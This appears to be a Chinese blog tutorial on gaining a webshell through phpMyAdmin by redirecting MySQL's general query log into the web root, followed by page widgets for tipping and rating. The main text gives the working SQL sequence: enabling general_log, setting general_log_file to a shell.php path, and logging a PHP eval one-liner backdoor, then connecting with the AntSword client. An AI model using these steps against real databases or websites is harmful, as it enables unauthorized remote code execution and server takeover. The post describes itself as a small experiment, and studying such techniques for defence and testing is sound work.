phpmyadmin+日志getshell

通过phpmyadmin管理后台getshell思路有很多种,比如直接写入一句话、创建表再导出、慢查询日志等…

这里较详细介绍一下全局日志getshell思路
 

phpMyAdmin

phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。
 

GetSHELL前提
  1. phpMyAdmin利用日志文件GetSHELL前提账号必须有可读可写权限
  2. MySQL 5.0版本以上会创建日志文件,我们通过修改日志文件的全局变量,就可以GetSHELL
  3. 满足上方两个条件,还需要知道网站的绝对路径 —> 传送门:如何爆路径
     
    这里简单用php探针来获取网站路径
    在这里插入图片描述
开始吧

查看general log是否开启
show variables like '%general%';
在这里插入图片描述
打开general_log日志读写功能
SET GLOBAL general_log='on'; SHOW VARIABLES LIKE '%general%';
在这里插入图片描述
创建日志文件
由于之前我们通过php探针得到了网站的绝对路径,然后我们就可以写入shell.php到网站的根目录下:
SET GLOBAL general_log_file='D:\\phpStudy\\PHPTutorial\\WWW\\shell.php'; (注意路径斜杆双写)
在这里插入图片描述
写入一句话到shell.php

SELECT '<?php @eval($_POST[yijuhua]);?>';
在这里插入图片描述
这里说明一点
如果eval连接不上,可采用另外代码执行函数写入
在这里插入图片描述
连上蚁剑
在这里插入图片描述
 
GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值